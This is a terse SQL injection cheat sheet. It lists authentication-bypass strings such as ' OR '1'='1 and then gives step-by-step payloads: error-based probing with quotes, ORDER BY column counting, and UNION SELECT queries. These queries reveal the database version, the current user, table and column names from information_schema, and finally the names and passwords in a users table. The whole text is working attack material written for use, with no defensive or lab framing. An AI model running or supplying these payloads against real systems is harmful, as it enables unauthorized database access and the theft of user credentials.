' or '1'='1
' OR '1'='1' --
' OR '1'='1' ({
' OR '1'='1' /*

Error based Enumeration: (ID parameter in url is not sanitised.)

Simply add a quote ' or double quote" after the id parameter.  The quote or double quote breaks the SQL query and produces an error, which is dependent on application verbosity:'

Gather information on table structure

Examine the error message, this can be done using the ORDER BY clause to the query:' ORDER BY 1--' ORDER BY 2--' ORDER BY 3--' ORDER BY 4--' ORDER BY 5--' ORDER BY 6--

Increase the column count until an an error message is received.  This means that the column number is not found/does not exist.  Using this technique allows us to know the number of columns so we can use union statements to expose data from the database.

Union Select' UNION SELECT 1,2,3,4,5,6--

Enumerate Version Number' UNION SELECT 1,2,3,4,@@version,6--
Version number will be printed out in field 5 of the table.

Get Current User' UNION SELECT 1,2,3,4,user(),6--
Current user will be printed out in field 5 of the table.

Enumerate Tables and Column Structures

This is done to better target the data which we wish to extract. Following prints out all of the table names of all the databases on this server' UNION ALL SELECT 1,2,3,4,table_name,6 FROM information_schema.tables--

Target a specific table (eg users) & Display its column names.' UNION ALL SELECT 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'--

Extract name and password values from the users table.' UNION SELECT 1,2,name,4,password,6 FROM users--